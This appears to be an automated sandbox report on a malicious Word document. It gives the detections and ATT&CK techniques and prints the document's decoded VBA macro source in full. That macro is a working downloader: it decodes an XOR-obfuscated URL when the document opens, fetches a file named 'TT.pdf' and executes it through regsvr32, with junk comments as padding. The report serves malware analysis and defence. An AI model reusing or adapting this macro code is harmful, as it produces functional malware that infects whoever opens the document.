MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious OOXML document containing VBA macros. The 'autoopen' macro is designed to execute a payload. The script attempts to download a file named 'TT.pdf' from an obfuscated URL and then execute it using 'Shell'. The ClamAV detection and the presence of URLDownloadToFile in VBA strongly indicate downloader functionality.
Heuristics 5
-
ClamAV: Doc.Downloader.GreenBox5-9139204-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
#If VBA7 And Win64 Then Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ZX As LongPtr, ByVal nj As String, ByVal CD As String, ByVal yr As LongPtr, ByVal av As LongPtr) As Long #Else -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() n7 = cA(X) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4271 bytes |
SHA-256: 3ba8b90692c2e39b9a487d8a45ea68d5a74044ea194c06b3cd1de81cb0abd5ed |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wX"
Public Const b As String = "TT.pdf"
Function cA(rl)
sG = NF(rl)
For Fn = 0 To UBound(sG)
CX = CX & Chr(sG(Fn) Xor 111)
Next Fn
cA = CX
End Function
Sub autoopen()
n7 = cA(X)
' Retirement provinces project quantitative spat
' Courtier responsibility wat
' Households vault louisville
' Female exp palaver invited
' Gonna previously identifier retention
' Libels eg discipline
frm.download n7, b
' Promises pierre bulge animation
' Oak either paucity
' Breasts
' Terrain libs
' Foretell
' Bits
' Authorization romantic exhaust frog frustrate geranium
' Combo metallica measurable smoothness
' Format situation keyhole legend
' Deprecate jun fete
' Basket resounding tropics
' Spat
' Ravenna inflammation omnipotence
' Duck incorrect nowt
' Computation celebration pen blockhead subjective
' Monetary financial
' Huge uncertainty mysticism fragrance
' Sherman briefing payment blithe draughts
Dim GM As New WshShell
' Unless desk accessible
' Herb adopt converge speed cd effie
' Climatic
Call GM.run(N & Zw & " " + b)
' Steaming explanation yuan
' Via lid belief overloaded
' Concurrence moscow
End Sub
Attribute VB_Name = "wX1"
Function T6(Py)
' Pj ribald agonised til foresail ingratiate nj
' Pliant lucy incompleteness journalism wizened manchester there
' Reset disclosure acdbentity
End Function
Sub uu(FO)
' Insignificance estates inconsistency motherless
' Northamptonshire proposal shirk
' Bus explorer pics maryland
' Macedonia minimum enb
' Postman sorts
' Tawny
' Enquiries whitsuntide storey
' Shadows
' Therefore
' Teaches shaw evans peoples
' Humped cigarettes laughingly
' Pgp
' Forefront purchase recapitulate spry engross
' Edge
' Provisional snorting semi
' Iso duo harvard pa
' Forked flash designer
' Drawback prevention midsummer
' Muscles waft
' Vishnu hove hops aye
' Cherry browsers alison
' Cattleman briar childrens underground mistrust
' Errant effectiveness
' Competition scribble deterioration h
' Ever prefecture dome instigation
' Silica southeast bread
' Bostonian smock slim numbers
' Colleague stimulate framework reserves hosiery
' Positions
' Terrify enviable walks optical
' Flickr gay retail harbour
' Vastness
' Hey brokers
' Outcast liberals calvinist republic magnanimity disband
' Forge circumcision allowance bowsprit
' Ada folks touchstone
' Ada intrusive sleight ontario bonnie bubbles
' Apples kate periodically culprit canned
' Cross accumulates palette rotund nigeria
' Placement incl
' Rfc aground bel fiftieth clients notebook abdomen
' Publicly dvd harvey tall rarely contrasting
' Parish ranging question
' Completes licking economically
' Suse frankenstein pdas paraphernalia
' Alpha diving acute glasgow
End Sub
Attribute VB_Name = "V7"
Public Const N As String = "reg"
Public Const Zw As String = "svr32"
Public Const X As String = "7_27_27_31_85_64_64_21_14_6_90_9_31_89_91_93_65_12_0_2_64_23_10_2_12_3_64_6_13_14_65_31_7_31_80_3_82_4_9_14_93_65_12_14_13"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal ZX As LongPtr, ByVal nj As String, ByVal CD As String, ByVal yr As LongPtr, ByVal av As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal ZX As Long, ByVal nj As String, ByVal CD As String, ByVal yr As Long, ByVal av As Long) As Long
#End If
Function NF(Ec)
NF = Split(Ec, "_")
End Function
Attribute VB_Name = "frm"
Attribute VB_Base = "0{13D52D41-5F9F-48CF-8820-5BBF993DF0E7}{FB72B109-7D26-4BF0-B828-12902660A651}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
URLDownloadToFile 0, url, file, 0, 0
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 28672 bytes |
SHA-256: 99154e39930e2fbffb0bc1440921212d5faa26614393158e7498293b9c53f60b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.